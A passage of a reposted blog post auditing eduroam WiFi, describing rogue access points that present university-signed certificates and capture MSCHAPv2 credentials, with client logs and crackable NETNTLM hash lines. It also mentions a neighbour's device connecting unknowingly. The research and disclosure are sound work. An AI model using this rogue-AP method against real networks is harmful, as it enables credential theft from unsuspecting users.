signed by an intermediate CA. When we look at the wpa_supplicant output when connecting to a benign access point: wlan0: Trying to associate with SSID 'eduroam' wlan0: Associated with 00:25:45:b5:38:22 wlan0: CTRL-EVENT-EAP-STARTED EAP authentication started wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=21 wlan0: CTRL-EVENT-EAP-METHOD EAP vendor 0 method 21 (TTLS) selected wlan0: CTRL-EVENT-EAP-PEER-CERT depth=3 subject='/C=DE/O=Deutsche Telekom AG/OU=T-TeleSec Trust Center/CN=Deutsche Telekom Root CA 2' wlan0: CTRL-EVENT-EAP-PEER-CERT depth=2 subject='/C=DE/O=DFN-Verein/OU=DFN-PKI/CN=DFN-Verein PCA Global - G01' wlan0: CTRL-EVENT-EAP-PEER-CERT depth=1 subject='/C=DE/ST=Nordrhein-Westfalen/L=Bochum/O=Ruhr-Universitaet Bochum/CN=Ruhr-Universitaet Bochum CA/emailAddress=rubca@ruhr-uni-bochum.de' wlan0: CTRL-EVENT-EAP-PEER-CERT depth=0 subject='/C=DE/ST=Nordrhein-Westfalen/L=Bochum/O=Ruhr-Universitaet Bochum/CN=radius.ruhr-uni-bochum.de' wlan0: CTRL-EVENT-EAP-SUCCESS EAP authentication completed successfully wlan0: WPA: Key negotiation completed with 00:25:45:b5:38:22 [PTK=CCMP GTK=TKIP] wlan0: CTRL-EVENT-CONNECTED - Connection to 00:25:45:b5:38:22 completed (auth) [id=0 id_str=] we can see, that the certificate is signed by the CA of my university (and not the "Deutsche_Telekom_Root_CA_2" CA). Actually, the chain is "Deutsche_Telekom_Root_CA_2" -> "DFN-Verein PCA Global - G01" -> "Ruhr-Universitaet Bochum CA". So my idea at this point was, it could be difficult (and perhaps costly) to get a signed certificate by the "Deutsche_Telekom_Root_CA_2" CA, but a signed certificate by the university is very easy as student or university staff. So, I created my own intermediate CA signed by my formerly created CA and generate a new certificate for my rogue eduroam access point. The values for all these CAs and the certificate are: CA: C=DE ST=Some-State O=h4des.org CN=sqall intermediate CA: C=DE ST=Some-Other-State O=h4des.org OU=intermediate CN=it is sqall again certificate for rogue access point: C=DE ST=Some-Other-State O=h4des.org OU=intermediate certificate CN=again sqall Again, wpa_supplicant is tried first. The settings are the same as for the test before (this means wpa_supplicant uses the certificate of the CA to check the validity of the rogue access point). The output of wpa_supplicant shows, that the rogue access point offers my new certificate signed by the intermediate CA and that the client connects without any problems: wlan0: Trying to associate with SSID 'eduroam' wlan0: Associated with b0:48:7a:88:fc:7a wlan0: CTRL-EVENT-EAP-STARTED EAP authentication started wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=4 -> NAK wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=21 wlan0: CTRL-EVENT-EAP-METHOD EAP vendor 0 method 21 (TTLS) selected wlan0: CTRL-EVENT-EAP-PEER-CERT depth=2 subject='/C=DE/ST=Some-State/O=h4des.org/CN=sqall' wlan0: CTRL-EVENT-EAP-PEER-CERT depth=1 subject='/C=DE/ST=Some-Other-State/O=h4des.org/OU=intermediate/CN=it is sqall again' wlan0: CTRL-EVENT-EAP-PEER-CERT depth=0 subject='/C=DE/ST=Some-Other-State/O=h4des.org/OU=intermediate certificate/CN=again sqall' EAP-TTLS: Invalid authenticator response in Phase 2 MSCHAPV2 success request The log file of my modified radius server shows me the MSCHAPv2 challenge-response values: mschap: Sat Jan 11 19:42:27 2014 username: pawlxyz@ruhr-uni-bochum.de challenge: 43:cd:42:0f:a6:14:46:4e response: 0d:b8:47:c0:11:a6:c9:10:a2:14:99:af:1d:15:d6:ef:4a:89:d3:95:aa:ba:2d:2b john NETNTLM: pawlxyz@ruhr-uni-bochum.de:$NETNTLM$42cd490fa604464c$0db486c012a6c910a21379ef1d15d6ff4a89d395baba2d2c Next I tested my Android 4.0.4 device. Like the wpa_supplicant client, it connects without any problems (because the access point is now considered valid). As a summary for this test: the client accepts certificates that are signed by intermediate CAs. In this constellation, it is the third reason for eduroam being insecure by design. It might be difficult to get a signed certificate by the main CA. But when intermediate CAs are in place, it could be a lot easier to get a valid certificate. The "Deutsche_Telekom_Root_CA_2" CA signed the "DFN-Verein PCA Global - G01" intermediate CA and this signed the CA of my university. I think that the "DFN-Verein PCA Global - G01" intermediate CA signed a lot of university CAs. And a lot of universities (like mine) offer the service to sign your server certificate (when it is inside the namespace of the university). When you are able to get a certificate that is signed by anyone of the CAs in the chain, you can forge a valid eduroam access point. Test with a server certificate signed by my university Ok, all the talk about "uhh, it is insecure with this used public key infrastructure!" and "it is theoretically possible to ...", let's break it! I helped the university to set up some servers. So I have access to a certificate signed by the university CA. And I configured my rogue access point to use this certificate. This certificate obviously does not have "radius.ruhr-uni-bochum.de" as CN value. It is valid for other addresses which I censored out. We saw in the tests above that the value in the CN field does not matter. First I tried wpa_supplicant. Now with the settings that should be used for a valid eduroam access point. This is the output: wlan0: Trying to associate with SSID 'eduroam' wlan0: Associated with b0:48:7a:88:fc:7a wlan0: CTRL-EVENT-EAP-STARTED EAP authentication started wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=4 -> NAK wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=21 wlan0: CTRL-EVENT-EAP-METHOD EAP vendor 0 method 21 (TTLS) selected wlan0: CTRL-EVENT-EAP-PEER-CERT depth=3 subject='/C=DE/O=Deutsche Telekom AG/OU=T-TeleSec Trust Center/CN=Deutsche Telekom Root CA 2' wlan0: CTRL-EVENT-EAP-PEER-CERT depth=2 subject='/C=DE/O=DFN-Verein/OU=DFN-PKI/CN=DFN-Verein PCA Global - G01' wlan0: CTRL-EVENT-EAP-PEER-CERT depth=1 subject='/C=DE/ST=Nordrhein-Westfalen/L=Bochum/O=Ruhr-Universitaet Bochum/CN=Ruhr-Universitaet Bochum CA/emailAddress=rubca@ruhr-uni-bochum.de' wlan0: CTRL-EVENT-EAP-PEER-CERT depth=0 subject='/C=DE/ST=Nordrhein-Westfalen/L=Bochum/O=Ruhr-Universitaet Bochum/OU=xxx/CN=xxx' EAP-TTLS: Invalid authenticator response in Phase 2 MSCHAPV2 success request And we can see that the client thinks it is a valid eduroam access point. The log file of the modified radius server shows my MSCHAPv2 credentials: mschap: Sun Jan 12 01:24:03 2014 username: pawlxyz@ruhr-uni-bochum.de challenge: 28:f5:bf:4d:3f:fe:bf:a2 response: 7a:ab:24:87:35:82:46:40:33:73:89:5a:77:bb:ee:c0:4b:56:8b:a8:67:af:e9:94 john NETNTLM: pawlxyz@ruhr-uni-bochum.de:$NETNTLM$28f5bb4d8ffaafa2$7aab248735824641d373895a77dbeec04b568ba867afe994 The same goes for my Android 4.0.4 mobile phone. A client is not able to distinguish a benign eduroam access point from my rogue access point. A fun fact that happened when I just started my rogue access point with the valid certificate: the mobile device of one of my neighbors connected instantly to my rogue access point (his or her login credentials are from a different university than mine). One has to love all the folks that have their WiFi always turned on Test with a client certificate signed by my university My university has the service to provide any student with a client certificate signed by the university's CA. My idea was "most clients do not provide options for the radius server address, perhaps they do not check if the certificate is only for clients". Beforehand, I can tell you that wpa_supplicant and Android 4.0.4 do (I did not test others). I used a certificate with this key usages and signed by my university's CA: X509v3 Key Usage: Digital Signature, Non Repudiation, Key Encipherment X509v3 Extended Key Usage: TLS Web Client Authentication, E-mail Protection So, when I try to connect with wpa_supplicant I get this output: wlan0: Trying to associate with SSID 'eduroam' wlan0: Associated with b0:48:7a:88:fc:7a wlan0: CTRL-EVENT-EAP-STARTED EAP authentication starte wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=4 -> NAK wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=21 wlan0: CTRL-EVENT-EAP-METHOD EAP vendor 0 method 21 (TTLS) selected TLS: Certificate verification failed, error 26 (unsupported certificate purpose) depth 0 for '/C=DE/O=Ruhr-Universitaet Bochum/CN=sqall' wlan0: CTRL-EVENT-EAP-TLS-CERT-ERROR reason=0 depth=0 subject='/C=DE/O=Ruhr-Universitaet Bochum/CN=sqall' err='unsupported certificate purpose' SSL: SSL3 alert: write (local SSL3 detected an error):fatal:unsupported certificate OpenSSL: openssl_handshake - SSL_connect error:14090086:SSL routines:SSL3_GET_SERVER_CERTIFICATE:certificate verify failed So we can clearly see, that wpa_supplicant checks the certificate purpose. The same goes for Android 4.0.4. It just tells me authentication error. To summarize this part: this does not have anything to do with the design or security of the eduroam network. This is only an implementation thing of the used client software. I just tested it with the hope to find a "fuck up" of some WiFi clients, but was disappointed Conclusion In this part I conclude my short security audit of the eduroam WiFi network. In my opinion it has a huge design flaw which is not to fix without changing the whole public key infrastructure. For me it seems that when they were designing the whole eduroam network they just thought "We need some public key cryptography for eduroam. The protocol supports TLS/SSL for authentication. It is used by the internet. So let us just use it too!". Using different CAs in different countries which signed a lot of intermediate CAs is not a good idea when the clients do not/can not check the address of the radius server which provides the certificate. Every certificate that is signed by one of the intermediate CAs or the used top CA is valid for any client that tries to connect to the eduroam WiFi. Furthermore, the idea of eduroam was to provide a network to which a client from a different country could also connect (for example, a client from Germany could connect to an eduroam access point when he is in Belgium). This is not possible when different top CAs are used in each country (or perhaps even within a country). Or rather this is only possible when certificates are not checked. But when they are not checked, what is the point of using TLS/SSL? The next thing is, a lot of universities (like mine) provide flawed tutorials to configure WiFi clients for eduroam. Even when MSCHAPv2 is available, the tutorials often used PAP to authenticate the client. PAP sends all user credentials in plaintext whereas MSCHAPv2 provides a challenge-response procedure. Furthermore, a lot of tutorials do not set up the CA to check the server certificate. Without this setting the client connects to any eduroam access point without checking the validity of the server certificate. This means, when an user configured her client with the help of the flawed tutorials and uses eduroam, she could just as well shout out her credentials everytime she is connecting to the WiFi network. The really bad thing about this is, when an adversary gets the user credentials of someone, he often has the user credentials for other services of the university as well because the same account is used (in the case of my university for the email account, the MSDNAA account, ...). I heared of some universities that even use these credentials to let the student subscribe/unsubscribe for exams of the offered courses. The only way a client can protect herself against this attack is by using MSCHAPv2. When MSCHAPv2 is used, the adversary still has to brute force the password when he successfully forges an eduroam access point. This means the security comes from the strength of her password (and the strength of MSCHAPv2 ... which uses DES and can be cracked relatively fast with services like https://www.cloudcracker.com/ :/ ). In my opinion, the only way to really fix this issue is to use an own public key infrastruture for the whole eduroam WiFi design. When an own CA is used for eduroam (perhaps with intermediate CAs for universities to use only for certificates that are used by the eduroam infrastructure) there is no way to forge a valid eduroam access point for an attacker, because he can not get a signed certificate for it. When the clients set up the CA in their eduroam settings, they would not connect to rogue access points. Even if the client is configured to use PAP instead of MSCHAPv2, the user credentials are secure in a way. But the own public key infrastructure would only work when the clients are configured correctly and this means that the universities have to fix their tutorials for the eduroam WiFi first. I wrote my university about this issue and they fixed some tutorials (for example for Android). But not all are fixed (for example for wpa_supplicant) and I do not think that they will fix all of them. But even so, fixing the tutorials will not help when a lot of students and university staff already applied the flawed configurations. Errata In the time of writing this article, I have not tested this statement. I just based it on the settings you can made in an access point, the statement of my university and the statement my friend had made. However, yesterday night I drove to the next city to test this statement at an other university (the TU Dortmund). Honestly, I did not expect this result: wlan0: Trying to associate with SSID 'eduroam' wlan0: Associated with 00:14:a8:14:86:f1 wlan0: CTRL-EVENT-EAP-STARTED EAP authentication started wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=21 wlan0: CTRL-EVENT-EAP-METHOD EAP vendor 0 method 21 (TTLS) selected wlan0: CTRL-EVENT-EAP-PEER-CERT depth=3 subject='/C=DE/O=Deutsche Telekom AG/OU=T-TeleSec Trust Center/CN=Deutsche Telekom Root CA 2' wlan0: CTRL-EVENT-EAP-PEER-CERT depth=2 subject='/C=DE/O=DFN-Verein/OU=DFN-PKI/CN=DFN-Verein PCA Global - G01' wlan0: CTRL-EVENT-EAP-PEER-CERT depth=1 subject='/C=DE/ST=Nordrhein-Westfalen/L=Bochum/O=Ruhr-Universitaet Bochum/CN=Ruhr-Universitaet Bochum CA/emailAddress=rubca@ruhr-uni-bochum.de' wlan0: CTRL-EVENT-EAP-PEER-CERT depth=0 subject='/C=DE/ST=Nordrhein-Westfalen/L=Bochum/O=Ruhr-Universitaet Bochum/CN=radius.ruhr-uni-bochum.de' EAP-TTLS: Phase 2 MSCHAPV2 authentication succeeded The wpa_supplicant output shows that even when I am at another university in Germany and use eduroam there, the CA chain looks the same as at my university. This means that my WiFi client still connects to the radius server of my university. I did not expect that (and have not really an idea how this infrastructure works exactly). Unfortunately, I have no way to test it with an university in a foreign country. Nevertheless, my conclusion which states that an own CA should have been used for the eduroam infrastructure remains the same. Sursa: eduroam WiFi security audit or why it is broken by design - sqall's blog
×
×
  • Create New...